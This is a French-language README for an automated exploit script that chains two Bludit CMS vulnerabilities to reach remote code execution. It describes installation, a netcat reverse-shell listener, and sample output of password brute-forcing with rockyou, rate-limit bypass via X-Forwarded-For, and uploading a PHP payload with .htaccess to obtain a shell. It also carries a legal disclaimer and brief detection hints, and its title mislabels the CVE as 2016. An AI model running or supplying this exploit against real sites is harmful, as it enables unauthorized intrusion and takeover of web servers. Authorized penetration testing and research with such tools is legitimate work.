
cve-2016-16113
_ _____ ___ _
__| |___ /_ ___ __ / _ \ _ __ ___ (_)
/ _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
\__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
Un outil d'exploitation automatisé qui combine CVE-2019-17240 (contournement d'authentification) et CVE-2019-16113 (téléchargement arbitraire de fichier) pour obtenir une exécution de code à distance sur des installations vulnérables de Bludit CMS.
RÉSERVÉ AUX TESTS DE SÉCURITÉ AUTORISÉS
Cet outil est destiné aux professionnels de la sécurité effectuant des tests d'intrusion autorisés et aux chercheurs en sécurité agissant dans les limites légales. L'accès non autorisé à des systèmes informatiques est illégal en vertu de lois telles que le Computer Fraud and Abuse Act (CFAA) aux États-Unis et des législations similaires dans le monde entier.
En utilisant cet outil, vous acceptez :
L'auteur décline toute responsabilité et n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Cet exploit automatise le processus suivant :
Versions concernées : Bludit CMS versions 3.9.2 et inférieures
requests# Clonez le dépôt
git clone https://github.com/yourusername/get-rce.git
cd get-rce
# Installez les dépendances
pip install -r requirements.txt
requirements.txt :
requests>=2.25.0
python3 get_rce.py
Le script vous demandera :
https://target.com)Avant d'exécuter l'exploit, configurez un écouteur netcat :
nc -lvnp 4444
Remplacez 4444 par le port de votre choix.
$ python3 get_rce.py
Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username):
[...] We are gonna default to 'admin' as username.
[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)
[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
SecLists : https://github.com/danielmiessler/SecLists
SecLists/Usernames/Names/names.txtSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txtRockYou : /usr/share/wordlists/rockyou.txt (Kali Linux)
X-Forwarded-For pour contourner la limitation de débit/bl-content/tmp/.htaccess pour garantir l'exécutionSi vous êtes administrateur système :
/bl-content/tmp/ pour les fichiers suspectsProblème : « The target seems to be down » (La cible semble inaccessible)
Problème : « Login failed » (Échec de la connexion)
Problème : « No shell received » (Aucun shell reçu)
d3vn0mi
Ce projet est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Voir l'avertissement en haut de ce README.
Les contributions, les signalements de problèmes et les demandes de fonctionnalités sont les bienvenus ! N'hésitez pas à consulter la page des issues.